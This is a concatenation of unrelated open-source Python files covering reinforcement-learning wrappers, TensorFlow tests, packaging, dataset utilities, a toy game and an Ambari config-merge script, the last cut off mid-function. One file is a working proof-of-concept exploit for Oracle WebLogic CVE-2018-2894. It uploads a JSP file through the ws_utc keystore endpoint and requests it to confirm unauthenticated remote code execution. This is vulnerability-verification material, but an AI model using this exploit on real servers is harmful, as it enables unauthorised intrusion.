nider/__init__.py | rockykitamura/nider | 123 | 12686494 | <gh_stars>100-1000
# -*- coding: utf-8 -*-
"""Top-level package for nider."""
__author__ = """<NAME>"""
__email__ = '<EMAIL>'
__version__ = '0.5.0'
|
pfrl/wrappers/monitor.py | ummavi/pfrl-1 | 824 | 12686500 | import time
from logging import getLogger
from gym.wrappers import Monitor as _GymMonitor
from gym.wrappers.monitoring.stats_recorder import StatsRecorder as _GymStatsRecorder
class Monitor(_GymMonitor):
"""`Monitor` with PFRL's `ContinuingTimeLimit` support.
`Agent` in PFRL might reset the env even when `done=False`
if `ContinuingTimeLimit` returns `info['needs_reset']=True`,
which is not expected for `gym.Monitor`.
For details, see
https://github.com/openai/gym/blob/master/gym/wrappers/monitor.py
"""
def _start(
self,
directory,
video_callable=None,
force=False,
resume=False,
write_upon_reset=False,
uid=None,
mode=None,
):
if self.env_semantics_autoreset:
raise NotImplementedError(
"Detect 'semantics.autoreset=True' in `env.metadata`, "
"which means the env is from deprecated OpenAI Universe."
)
ret = super()._start(
directory=directory,
video_callable=video_callable,
force=force,
resume=resume,
write_upon_reset=write_upon_reset,
uid=uid,
mode=mode,
)
env_id = self.stats_recorder.env_id
self.stats_recorder = _StatsRecorder(
directory,
"{}.episode_batch.{}".format(self.file_prefix, self.file_infix),
autoreset=False,
env_id=env_id,
)
if mode is not None:
self._set_mode(mode)
return ret
class _StatsRecorder(_GymStatsRecorder):
"""`StatsRecorder` with PFRL's `ContinuingTimeLimit` support.
For details, see
https://github.com/openai/gym/blob/master/gym/wrappers/monitoring/stats_recorder.py
"""
def __init__(
self,
directory,
file_prefix,
autoreset=False,
env_id=None,
logger=getLogger(__name__),
):
super().__init__(directory, file_prefix, autoreset=autoreset, env_id=env_id)
self._save_completed = True
self.logger = logger
def before_reset(self):
assert not self.closed
if self.done is not None and not self.done and self.steps > 0:
self.logger.debug(
"Tried to reset the env which is not done=True. "
"StatsRecorder completes the last episode."
)
self.save_complete()
self.done = False
if self.initial_reset_timestamp is None:
self.initial_reset_timestamp = time.time()
def after_step(self, observation, reward, done, info):
self._save_completed = False
return super().after_step(observation, reward, done, info)
def save_complete(self):
if not self._save_completed:
super().save_complete()
self._save_completed = True
def close(self):
self.save_complete()
super().close()
|
2018/CVE-2018-2894/poc/pocsploit/CVE-2018-2894.py | hjyuan/reapoc | 421 | 12686511 | import requests
# Vuln Base Info
def info():
return {
"author": "cckuailong",
"name": '''Oracle WebLogic RCE''',
"description": '''Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server.''',
"severity": "critical",
"references": [
"https://blog.detectify.com/2018/11/14/technical-explanation-of-cve-2018-2894-oracle-weblogic-rce/",
"https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2018-2894"
],
"classification": {
"cvss-metrics": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"cvss-score": "",
"cve-id": "CVE-2018-2894",
"cwe-id": ""
},
"metadata":{
"vuln-target": "",
},
"tags": ["cve", "cve2018", "oracle", "weblogic", "rce"],
}
# Vender Fingerprint
def fingerprint(url):
return True
# Proof of Concept
def poc(url):
result = {}
try:
url = format_url(url)
path = """/ws_utc/resources/setting/options"""
method = "POST"
data = """setting_id=general&BasicConfigOptions.workDir=%2Fu01%2Foracle%2Fuser_projects%2Fdomains%2Fbase_domain%2Fservers%2FAdminServer%2Ftmp%2F_WL_internal%2Fcom.oracle.webservices.wls.ws-testclient-app-wls%2F4mcj4y%2Fwar%2Fcss&BasicConfigOptions.proxyHost=&BasicConfigOptions.proxyPort=80"""
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
path = """/ws_utc/resources/setting/keystore"""
method = "POST"
data = """------WebKitFormBoundaryuim0dyiDSPBPu31g
Content-Disposition: form-data; name="ks_name"
{{randstr}}
------WebKitFormBoundaryuim0dyiDSPBPu31g
Content-Disposition: form-data; name="ks_edit_mode"
false
------WebKitFormBoundaryuim0dyiDSPBPu31g
Content-Disposition: form-data; name="ks_password_front"
------WebKitFormBoundaryuim0dyiDSPBPu31g
Content-Disposition: form-data; name="ks_password"
------WebKitFormBoundaryuim0dyiDSPBPu31g
Content-Disposition: form-data; name="ks_password_changed"
false
------WebKitFormBoundaryuim0dyiDSPBPu31g
Content-Disposition: form-data; name="ks_filename"; filename="{{randstr}}.jsp"
Content-Type: application/octet-stream
<%@ page import="java.util.*,java.io.*"%>
<%@ page import="java.security.MessageDigest"%>
<%
String cve = "CVE-2018-2894";
MessageDigest alg = MessageDigest.getInstance("MD5");
alg.reset();
alg.update(cve.getBytes());
byte[] digest = alg.digest();
StringBuffer hashedpasswd = new StringBuffer();
String hx;
for (int i=0;i<digest.length;i++){
hx = Integer.toHexString(0xFF & digest[i]);
//0x03 is equal to 0x3, but we need 0x03 for our md5sum
if(hx.length() == 1){hx = "0" + hx;}
hashedpasswd.append(hx);
}
out.println(hashedpasswd.toString());
%>
------WebKitFormBoundaryuim0dyiDSPBPu31g--"""
headers = {'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundaryuim0dyiDSPBPu31g'}
resp1 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
path = """/ws_utc/css/config/keystore/{{id}}_{{randstr}}.jsp"""
method = "GET"
data = """"""
headers = {}
resp2 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
if ("""26ec00a3a03f6bfc5226fd121567bb58""" in resp2.text):
result["success"] = True
result["info"] = info()
result["payload"] = url+path
except:
result["success"] = False
return result
# Exploit, can be same with poc()
def exp(url):
return poc(url)
# Utils
def format_url(url):
url = url.strip()
if not ( url.startswith('http://') or url.startswith('https://') ):
url = 'http://' + url
url = url.rstrip('/')
return url |
tensorflow/compiler/tests/reverse_ops_test.py | abhaikollara/tensorflow | 848 | 12686577 | <gh_stars>100-1000
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Functional tests for XLA Reverse Ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import itertools
import numpy as np
from tensorflow.compiler.tests import xla_test
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.ops import array_ops
from tensorflow.python.platform import googletest
class ReverseOpsTest(xla_test.XLATestCase):
def testReverseOneDim(self):
shape = (7, 5, 9, 11)
for revdim in range(-len(shape), len(shape)):
self._AssertReverseEqual([revdim], shape)
def testReverseMoreThanOneDim(self):
shape = (7, 5, 9, 11)
# The offset is used to test various (but not all) combinations of negative
# and positive axis indices that are guaranteed to not collide at the same
# index.
for revdims in itertools.chain.from_iterable(
itertools.combinations(range(-offset,
len(shape) - offset), k)
for k in range(2,
len(shape) + 1)
for offset in range(0, len(shape))):
self._AssertReverseEqual(revdims, shape)
def _AssertReverseEqual(self, revdims, shape):
np.random.seed(120)
pval = np.random.randint(0, 100, size=shape).astype(float)
with self.session():
with self.test_scope():
p = array_ops.placeholder(dtypes.int32, shape=shape)
axis = constant_op.constant(
np.array(revdims, dtype=np.int32),
shape=(len(revdims),),
dtype=dtypes.int32)
rval = array_ops.reverse(p, axis).eval({p: pval})
slices = [
slice(-1, None, -1)
if d in revdims or d - len(shape) in revdims else slice(None)
for d in range(len(shape))
]
self.assertEqual(pval[slices].flatten().tolist(), rval.flatten().tolist())
if __name__ == '__main__':
googletest.main()
|
setup.py | jameswilkerson/elex | 183 | 12686591 | <reponame>jameswilkerson/elex<filename>setup.py
import os.path
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
def read(filename):
return open(os.path.join(os.path.dirname(__file__), filename)).read()
setup(
name="elex",
version="2.4.4",
author="<NAME>, <NAME>",
author_email="<EMAIL>, <EMAIL>",
url="https://github.com/newsdev/elex",
description="Client for parsing the Associated Press's elections API",
long_description=read("README.rst"),
packages=["elex", "elex.cli", "elex.api", "tests"],
entry_points={"console_scripts": ("elex = elex.cli:main",)},
license="Apache License 2.0",
keywords="election race candidate democracy news associated press",
install_requires=[
"CacheControl==0.12.*",
"cement==2.10.2",
"lockfile==0.12.2",
"pymongo==3.3",
"python-dateutil==2.7.*",
"requests==2.20.*",
"ujson==1.35",
],
classifiers=[
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"Topic :: Software Development :: Libraries :: Python Modules",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.6",
],
)
|
python/pygcylon/examples/util.py | deHasara/cylon | 229 | 12686593 | ##
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##
'''
utils for examples
'''
import cupy as cp
import cudf
def create_sorted_cudf_df(ncols, nrows, start=0, step=1):
df_local = cudf.DataFrame()
data_start = start
for i in range(ncols):
df_local["col-" + str(i)] = cp.arange(start=data_start, stop=data_start + nrows * step, step=step, dtype="int64")
data_start += nrows * step
return df_local
def create_random_data_df(ncols, nrows, low=0, high=1000000000000):
df_local = cudf.DataFrame()
for i in range(ncols):
df_local["col-" + str(i)] = cp.random.randint(low=low, high=high, size=nrows, dtype="int64")
return df_local
def random_data_df(nrows, col_lows=[0, 100], col_highs=[100, 200]):
df_local = cudf.DataFrame()
for i in range(len(col_lows)):
df_local["col-" + str(i)] = cp.random.randint(low=col_lows[i], high=col_highs[i], size=nrows, dtype="int64")
return df_local
import string
import random
def random_str(size=6, chars=string.ascii_uppercase + string.digits):
"""
generate a random string with given size and char list
source: https://stackoverflow.com/questions/2257441/random-string-generation-with-upper-case-letters-and-digits?rq=1
"""
return ''.join(random.choice(chars) for _ in range(size))
def create_random_str_df(ncols, nrows, min_digits=2, max_digits=7):
df_local = cudf.DataFrame()
for i in range(ncols):
df_local["col-" + str(i)] = [random_str(min_digits + i % (max_digits - min_digits)) for i in range(nrows)]
return df_local
def get_size(df_size_str):
if df_size_str.endswith("MB"):
df_size = df_size_str[:-2]
df_size = int(df_size) * 1000000
return df_size
elif df_size_str.endswith("GB"):
df_size = df_size_str[:-2]
df_size = int(df_size) * 1000000000
return df_size
else:
raise ValueError("Size has to be either MB or GB")
def get_rows(df_size_str, ncols):
df_size = get_size(df_size_str)
# each element is int64, so 8 bytes
return int(df_size / (ncols * 8))
|
CLUE_Rock_Paper_Scissors/very-simple/code.py | gamblor21/Adafruit_Learning_System_Guides | 665 | 12686598 | <reponame>gamblor21/Adafruit_Learning_System_Guides<gh_stars>100-1000
# clue-verysimple-rpsgame v1.0
# CircuitPython rock paper scissors game simple text game
# based on https://www.youtube.com/watch?v=dhaaZQyBP2g
# Tested with CLUE and Circuit Playground Bluefruit (Alpha)
# and CircuitPython and 5.3.0
# copy this file to CLUE/CPB board as code.py
# MIT License
# Copyright (c) 2015 <NAME>, KidsCanCode LLC
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import random
moves = ["r", "p", "s"]
player_wins = ["pr", "sp", "rs"]
print("Rock, paper scissors game: enter first letter for move or q for quit")
while True:
player_move = input("Your move: ")
if player_move == "q":
break
computer_move = random.choice(moves)
print("You:", player_move)
print("Me:", computer_move)
if player_move == computer_move:
print("Tie")
elif player_move + computer_move in player_wins:
print("You win!")
else:
print("You lose!")
|
test/misc/mocktest.py | skysightsoaringweather/wrf-python | 315 | 12686599 | import sys
import os
try:
from unittest.mock import MagicMock
except ImportError:
from mock import Mock as MagicMock
class Mock(MagicMock):
@classmethod
def __getattr__(cls, name):
return Mock()
MOCK_MODULES = ["numpy", "numpy.ma", "xarray", "cartopy",
"pandas", "matplotlib", "netCDF4", "mpl_toolkits.basemap",
"wrf._wrffortran"]
sys.modules.update((mod_name, Mock()) for mod_name in MOCK_MODULES)
consts = {"DEFAULT_FILL": 9.9692099683868690E36,
"DEFAULT_FILL_INT8": -127,
"DEFAULT_FILL_INT16": -32767,
"DEFAULT_FILL_INT32": -2147483647,
"DEFAULT_FILL_INT64": -9223372036854775806,
"DEFAULT_FILL_FLOAT": 9.9692099683868690E36,
"DEFAULT_FILL_DOUBLE": 9.9692099683868690E36,
"fomp_sched_static": 1,
"fomp_sched_dynamic": 2,
"fomp_sched_guided": 3,
"fomp_sched_auto": 4}
class MockWrfConstants(object):
def __init__(self):
self.__dict__ = consts
def mock_asscalar(val):
return float(val)
sys.modules["wrf._wrffortran"].wrf_constants = MockWrfConstants()
sys.modules["wrf._wrffortran"].omp_constants = MockWrfConstants()
sys.modules["numpy"].asscalar = mock_asscalar
try:
import wrf
except ImportError:
pass
print(wrf.get_coord_pairs.__doc__)
|
py/base/EretPreambleSequence.py | Wlgen/force-riscv | 111 | 12686606 | #
# Copyright (C) [2020] Futurewei Technologies, Inc.
#
# FORCE-RISCV is licensed under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES
# OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
# NON-INFRINGEMENT, MERCHANTABILITY OR FIT FOR A PARTICULAR PURPOSE.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# classes, code related to Eret preamble sequence.
from base.Sequence import Sequence
# -------------------------------------------------------------------------------------------------------
# EretPreambleSequence to provide base class for eret preamble sequence.
# -------------------------------------------------------------------------------------------------------
class EretPreambleSequence(Sequence):
def __init__(self, gen_thread):
super().__init__(gen_thread)
def generate(self, **kargs):
pass
|
rigl/experimental/jax/datasets/dataset_base.py | xhchrn/rigl | 276 | 12686620 | # coding=utf-8
# Copyright 2021 RigL Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Dataset Classes.
Dataset abstraction/factory to allow us to easily use tensorflow datasets (TFDS)
with JAX/FLAX, by defining a bunch of wrappers, including preprocessing.
"""
import abc
from typing import MutableMapping, Optional
import tensorflow.compat.v2 as tf
import tensorflow_datasets as tfds
class Dataset(metaclass=abc.ABCMeta):
"""Base class for datasets.
Attributes:
DATAKEY: The key used for the data component of a Tensorflow Dataset
(TFDS) sample, e.g. 'image' for image datasets.
LABELKEY: The key used fot the label component of a Tensorflow Dataset
sample, i.e. 'label'.
name: The TFDS name of the dataset.
batch_size: The batch size to use for the training dataset.
batch_size_test: The batch size to use for the test dataset.
num_classes: the number of supervised classes in the dataset.
shape: the shape of an input data array.
"""
DATAKEY: Optional[str] = None
LABELKEY: str = 'label'
def __init__(self,
name,
batch_size,
batch_size_test,
shuffle_buffer_size,
prefetch_size = 1,
seed = None):
"""Base class for datasets.
Args:
name: The TFDS name of the dataset.
batch_size: The batch size to use for the training dataset.
batch_size_test: The batch size to use for the test dataset.
shuffle_buffer_size: The buffer size to use for dataset shuffling.
prefetch_size: The number of mini-batches to prefetch.
seed: The random seed used to shuffle.
Returns:
A Dataset object.
"""
super().__init__()
self.name = name
self.batch_size = batch_size
self.batch_size_test = batch_size_test
self._shuffle_buffer_size = shuffle_buffer_size
self._prefetch_size = prefetch_size
self._train_ds, self._train_info = tfds.load(
self.name,
split=tfds.Split.TRAIN,
data_dir=self._dataset_dir(),
with_info=True)
self._train_ds = self._train_ds.shuffle(
self._shuffle_buffer_size,
seed).map(self.preprocess).cache().map(self.augment).batch(
self.batch_size, drop_remainder=True).prefetch(self._prefetch_size)
self._test_ds, self._test_info = tfds.load(
self.name,
split=tfds.Split.TEST,
data_dir=self._dataset_dir(),
with_info=True)
self._test_ds = self._test_ds.map(self.preprocess).cache().batch(
self.batch_size_test).prefetch(self._prefetch_size)
self.num_classes = self._train_info.features['label'].num_classes
self.shape = self._train_info.features['image'].shape
def _dataset_dir(self):
"""Returns the dataset path for the TFDS data."""
return None
def get_train(self):
"""Returns the training dataset."""
return iter(tfds.as_numpy(self._train_ds))
def get_train_len(self):
"""Returns the length of the training dataset."""
return self._train_info.splits['train'].num_examples
def get_test(self):
"""Returns the test dataset."""
return iter(tfds.as_numpy(self._test_ds))
def get_test_len(self):
"""Returns the length of the test dataset."""
return self._test_info.splits['test'].num_examples
def preprocess(
self, data):
"""Preprocessing fn used by TFDS map for normalization.
This function is for transformations that can be cached, e.g.
normalization/whitening.
Args:
data: Data sample.
Returns:
Data after being normalized/transformed.
"""
return data
def augment(
self, data):
"""Preprocessing fn used by TFDS map for augmentation at training time.
This function is for transformations that should not be cached, e.g. random
augmentation that should change for every sample, and are only applied at
training time.
Args:
data: Data sample.
Returns:
Data after being augmented/transformed.
"""
return data
class ImageDataset(Dataset):
"""Base class for image datasets."""
DATAKEY = 'image'
def preprocess(
self, data):
"""Preprocessing function used by TFDS map for normalization.
This function is for transformations that can be cached, e.g.
normalization/whitening.
Args:
data: Data sample.
Returns:
Data after being normalized/transformed.
"""
data = super().preprocess(data)
# Ensure we only provide the image and label, stripping out other keys.
return dict((key, val)
for key, val in data.items()
if key in [self.LABELKEY, self.DATAKEY])
|
ambari-server/src/main/resources/scripts/takeover_config_merge.py | likenamehaojie/Apache-Ambari-ZH | 1,664 | 12686626 | <filename>ambari-server/src/main/resources/scripts/takeover_config_merge.py
#!/usr/bin/env python
'''
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import optparse
import sys
import os
import logging
import tempfile
import json
import re
import base64
import time
import xml
import xml.etree.ElementTree as ET
import StringIO
import ConfigParser
from optparse import OptionGroup
logger = logging.getLogger('AmbariTakeoverConfigMerge')
CONFIG_MAPPING_HELP_TEXT = """
JSON file should content map with {regex_path : <service>-log4j}
Example:
{".+/hadoop/.+/log4j.properties" : "hdfs-log4j",
".+/etc/zookeeper/conf/log4j.properties" : "zookeeper-log4j"
"c6401.ambari.apache.org/etc/hive/conf/log4j.properties" : "hive-log4j"}
"""
LICENSE = """
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""
class Parser:
pass
class ShParser(Parser):
def read_data_to_map(self, path):
with open(path, 'r') as file:
file_content = file.read()
return {"content" : file_content}, None
class YamlParser(Parser): # Used Yaml parser to read data into a map
def read_data_to_map(self, path):
try:
import yaml
except ImportError:
logger.error("Module PyYAML not installed. Please try to execute \"pip install pyyaml\" for installing PyYAML module.")
sys.exit(1)
configurations = {}
with open(path, 'r') as file:
try:
for name, value in yaml.load(file).iteritems():
if name != None:
configurations[name] = str(value)
except:
logger.error("Couldn't parse {0} file. Skipping ...".format(path))
return None, None
return configurations, None
class PropertiesParser(Parser): # Used ConfigParser parser to read data into a map
def read_data_to_map(self, path):
configurations = {}
try :
#Adding dummy section to properties file content for use ConfigParser
properties_file_content = StringIO.StringIO()
properties_file_content.write('[dummysection]\n')
properties_file_content.write(open(path).read())
properties_file_content.seek(0, os.SEEK_SET)
cp = ConfigParser.ConfigParser()
cp.optionxform = str
cp.readfp(properties_file_content)
for section in cp._sections:
for name, value in cp._sections[section].iteritems():
if name != None:
configurations[name] = value
del configurations['__name__']
except:
logger.exception("ConfigParser error: ")
return configurations, None
class XmlParser(Parser): # Used DOM parser to read data into a map
def read_data_to_map(self, path):
configurations = {}
properties_attributes = {}
tree = ET.parse(path)
root = tree.getroot()
for properties in root.getiterator('property'):
name = properties.find('name')
value = properties.find('value')
#TODO support all properties attributes
final = properties.find('final')
if name != None:
name_text = name.text if name.text else ""
else:
logger.warn("No name is found for one of the properties in {0}, ignoring it".format(path))
continue
if value != None:
value_text = value.text if value.text else ""
else:
logger.warn("No value is found for \"{0}\" in {1}, using empty string for it".format(name_text, path))
value_text = ""
if final != None:
final_text = final.text if final.text else ""
properties_attributes[name_text] = final_text
configurations[name_text] = value_text
logger.debug("Following configurations found in {0}:\n{1}".format(path, configurations))
return configurations, properties_attributes
class ConfigMerge:
CONTENT_UNKNOWN_FILES_MAPPING_FILE = {}
LEFT_INPUT_DIR = "/tmp/left"
RIGHT_INPUT_DIR = "/tmp/right"
INPUT_DIR = '/etc/hadoop'
OUTPUT_DIR = '/tmp'
OUT_FILENAME = 'ambari_takeover_config_merge.out'
JSON_FILENAME = 'ambari_takeover_config_merge.json'
PARSER_BY_EXTENSIONS = {'.xml' : XmlParser(), '.yaml' : YamlParser(), '.properties' : PropertiesParser(), '.sh' : ShParser()}
SUPPORTED_EXTENSIONS = ['.xml', '.yaml', '.properties', '.sh']
SUPPORTED_FILENAME_ENDINGS = {".sh" : "-env"}
UNKNOWN_FILES_MAPPING_FILE = None
CONFIGS_WITH_CONTENT = ['pig-properties', '-log4j']
NOT_MAPPED_FILES = ['log4j.properties']
config_files_map = {}
left_file_paths = None
right_file_paths = None
def __init__(self, config_files_map=None, left_file_paths=None, right_file_paths=None):
self.config_files_map = config_files_map
self.left_file_paths = left_file_paths
self.right_file_paths = right_file_paths
@staticmethod
def get_all_supported_files_grouped_by_name(extensions=SUPPORTED_EXTENSIONS, directory=INPUT_DIR):
filePaths = {}
for dirName, subdirList, fileList in os.walk(directory, followlinks=True):
for file in fileList:
root, ext = os.path.splitext(file)
if ext in extensions:
file_path = os.path.join(dirName, file)
if ext in ConfigMerge.SUPPORTED_FILENAME_ENDINGS and not ConfigMerge.SUPPORTED_FILENAME_ENDINGS[ext] in root:
logger.warn("File {0} is not configurable by Ambari. Skipping...".format(file_path))
continue
config_name = None
if ConfigMerge.UNKNOWN_FILES_MAPPING_FILE:
for path_regex, name in ConfigMerge.CONTENT_UNKNOWN_FILES_MAPPING_FILE.iteritems():
match = re.match(path_regex, os.path.relpath(file_path, ConfigMerge.INPUT_DIR))
if match:
config_name = name
break
if not config_name:
if file in ConfigMerge.NOT_MAPPED_FILES:
if ConfigMerge.UNKNOWN_FILES_MAPPING_FILE:
logger.error("File {0} doesn't match any regex from {1}".format(file_path, ConfigMerge.UNKNOWN_FILES_MAPPING_FILE))
else:
logger.error("Cannot map {0} to Ambari config type. Please use -u option to specify config mapping for this file. \n"
"For more information use --help option for script".format(file_path))
continue
else:
config_name = file
if not config_name in filePaths:
filePaths[config_name] = []
filePaths[config_name].append((file_path, ConfigMerge.PARSER_BY_EXTENSIONS[ext]))
return filePaths
@staticmethod
def merge_configurations(filepath_to_configurations):
configuration_information_dict = {}
property_name_to_value_to_filepaths = {}
merged_configurations = {}
for path, configurations in filepath_to_configurations.iteritems():
for configuration_name, value in configurations.iteritems():
if not configuration_name in property_name_to_value_to_filepaths:
property_name_to_value_to_filepaths[configuration_name] = {}
if not value in property_name_to_value_to_filepaths[configuration_name]:
property_name_to_value_to_filepaths[configuration_name][value] = []
logger.debug("Iterating over '{0}' with value '{1}' in file '{2}'".format(configuration_name, value, path))
property_name_to_value_to_filepaths[configuration_name][value].append(path)
merged_configurations[configuration_name] = value
return merged_configurations, property_name_to_value_to_filepaths
@staticmethod
def format_for_blueprint(configurations, attributes):
all_configs = []
for configuration_type, configuration_properties in configurations.iteritems():
is_content = False
all_configs.append({})
for config_with_content in ConfigMerge.CONFIGS_WITH_CONTENT:
if config_with_content in configuration_type:
is_content = True
break
if is_content:
content = LICENSE
for property_name, property_value in configuration_properties.iteritems():
content+=property_name + "=" + property_value + "\n"
all_configs[-1][configuration_type] = {'properties': {"content" : content}}
else:
all_configs[-1][configuration_type] = {'properties' :configuration_properties}
for configuration_type_attributes, properties_attributes in attributes.iteritems():
if properties_attributes and configuration_type == configuration_type_attributes:
all_configs[-1][configuration_type].update({"properties_attributes" : {"final" : properties_attributes}})
return {
"configurations": all_configs,
"host_groups": [],
"Blueprints": {}
}
@staticmethod
def format_conflicts_output(property_name_to_value_to_filepaths):
output = ""
for property_name, value_to_filepaths in property_name_to_value_to_filepaths.iteritems():
if len(value_to_filepaths) == 1:
continue
first_item = False
for value, filepaths in value_to_filepaths.iteritems():
if not first_item:
first_item = True
output += "\n\n=== {0} | {1} | {2} |\nHas conflicts with:\n\n".format(property_name,filepaths[0], value)
continue
for filepath in filepaths:
output += "| {0} | {1} | {2} |\n".format(property_name, filepath, value)
return output
def perform_merge(self):
result_configurations = {}
result_property_attributes = {}
has_conflicts = False
for filename, paths_and_parsers in self.config_files_map.iteritems():
filepath_to_configurations = {}
filepath_to_property_attributes = {}
configuration_type = os.path.splitext(filename)[0]
for path_and_parser in paths_and_parsers:
path, parser = path_and_parser
logger.debug("Read data from {0}".format(path))
parsed_configurations_from_path, parsed_properties_attributes = parser.read_data_to_map(path)
if parsed_configurations_from_path != None:
filepath_to_configurations[path] = parsed_configurations_from_path
if parsed_properties_attributes != None:
filepath_to_property_attributes[path] = parsed_properties_attributes
#configs merge
merged_configurations, property_name_to_value_to_filepaths = ConfigMerge.merge_configurations(
filepath_to_configurations)
#properties attributes merge
merged_attributes, property_name_to_attribute_to_filepaths = ConfigMerge.merge_configurations(
filepath_to_property_attributes)
configuration_conflicts_output = ConfigMerge.format_conflicts_output(property_name_to_value_to_filepaths)
attribute_conflicts_output = ConfigMerge.format_conflicts_output(property_name_to_attribute_to_filepaths)
if configuration_conflicts_output:
has_conflicts = True
conflict_filename = os.path.join(self.OUTPUT_DIR, configuration_type + "-conflicts.txt")
logger.warn(
"You have configurations conflicts for {0}. Please check {1}".format(configuration_type, conflict_filename))
with open(conflict_filename, "w") as fp:
fp.write(configuration_conflicts_output)
if attribute_conflicts_output:
has_conflicts = True
conflict_filename = os.path.join(self.OUTPUT_DIR, configuration_type + "-attributes-conflicts.txt")
logger.warn(
"You have property attribute conflicts for {0}. Please check {1}".format(configuration_type, conflict_filename))
with open(conflict_filename, "w") as fp:
fp.write(attribute_conflicts_output)
result_configurations[configuration_type] = merged_configurations
result_property_attributes[configuration_type] = merged_attributes
result_json_file = os.path.join(self.OUTPUT_DIR, "blueprint.json")
logger.info("Using '{0}' file as output for blueprint template".format(result_json_file))
with open(result_json_file, 'w') as outfile:
outfile.write(json.dumps(ConfigMerge.format_for_blueprint(result_configurations, result_property_attributes), sort_keys=True, indent=4,
separators=(',', ': ')))
if has_conflicts:
logger.info("Script finished with configurations conflicts, please resolve them before using the blueprint")
return 1
else:
logger.info("Script successfully finished")
return 0
def perform_diff(self):
configurations_conflicts = {}
attributes_conflicts = {}
file_conflicts = []
matches_configs = []
for right_configs_names in self.right_file_paths:
for left_configs_names in self.left_file_paths:
if right_configs_names == left_configs_names:
matches_configs.append(right_configs_names)
for match_config in matches_configs:
configurations_conflicts[match_config], attributes_conflicts[match_config] = ConfigMerge.configuration_diff(self.left_file_paths[match_config], self.right_file_paths[match_config])
file_conflicts = ConfigMerge.get_missing_files(self.right_file_paths, matches_configs, ConfigMerge.LEFT_INPUT_DIR) + \
ConfigMerge.get_missing_files(self.left_file_paths, matches_configs, ConfigMerge.RIGHT_INPUT_DIR)
configuration_diff_output = None
configuration_diff_output = ConfigMerge.format_diff_output(file_conflicts, configurations_conflicts, attributes_conflicts)
if configuration_diff_output and configuration_diff_output != "":
